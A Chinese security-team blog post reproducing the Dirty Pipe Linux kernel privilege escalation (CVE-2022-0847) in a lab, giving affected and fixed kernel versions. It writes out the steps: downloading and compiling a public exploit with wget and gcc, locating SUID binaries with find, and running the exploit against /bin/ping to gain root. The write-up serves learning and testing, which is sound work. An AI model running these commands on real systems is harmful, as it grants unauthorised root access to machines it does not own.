1.1 前言
影响范围:5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102
可覆盖重写任意可读文件中的数据,可将普通权限的用户提升到特权 root
具体漏洞相关信息:脏管道漏洞 — 脏管道漏洞文档 (dirtypipe-cm4all-com.translate.goog)
环境:最好是ubuntu 16.04 或18.04(#我推荐使用18.04,我在配置的时候16.04问题比较多#下载链接:Index of /ubuntu-releases/18.04/ (zju.edu.cn))
环境配置时间可能较长,可以同上面链接,了解漏洞,如何产生以及漏洞特性。
1.2环境检查
使用uname -r命令,查看当前内核版本,一般在 5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102版本以内,可以受影响。在配置前后版本不一样。配置前版本都会有所不同
1.3环境搭建
git clone https://github.com/brant-ruan/metarget.git
cd metarget/
pip3 install -r requirements.txt #上面三条命令是为了安装metarget项目
sudo ./metarget cnv install cve-2022-0847 #安装你想要的漏洞,当然我们这里是Dirtypipe
如果你使用的是linux18.04版本安装起来应该是没什么问题,由于我已经安装过了,所以这里不展示效果。
当我们安装好以后版本应该是这样
1.4漏洞复现(两个方法)
方法一:
git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit
cd CVE-2022-0847-DirtyPipe-Exploit
使用这两条命令将POC弄下来
好的失败了,那位大佬的文章的一样没成功,我抱着侥幸的心里试试,也不行。
方法二:
mkdir dirtypipez
cd dirtypipez
wget https://haxx.in/files/dirtypipez.c
gcc dirtypipez.c -o dirtypipez
按照代码来输入,我们直接来看运行效果:
可以看到成功下载,但是这个POC需要有一个具有SUID权限的可执行文件,在利用这个文件进行提权,你可以自己写也可以使用命令找,例如:
find / -perm -u=s -type f 2>/dev/null
可以看到有很多,你可以找一个你看的顺眼的,我这里使用的是/bin/ping
./dirtypipez /bin/ping
执行命令以后我们就提权成功了
lLinux 内核 >= 5.16.11
lLinux 内核 >= 5.15.25
lLinux 内核 >= 5.10.102
内核在这几个版本内,已经是安全的了
本篇文章用于记录和学习,也希望能够帮助到一些人.
下一篇,研究这个漏洞具体实现,知其然,知其所以然.
往期精选
围观
丨更多
热文
丨更多
·end·
—如果喜欢,快分享给你的朋友们吧—
我们一起愉快的玩耍吧
原文始发于微信公众号(Rot5pider安全团队):漏洞复现#CVE-2022-0847(Linux内核提权)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论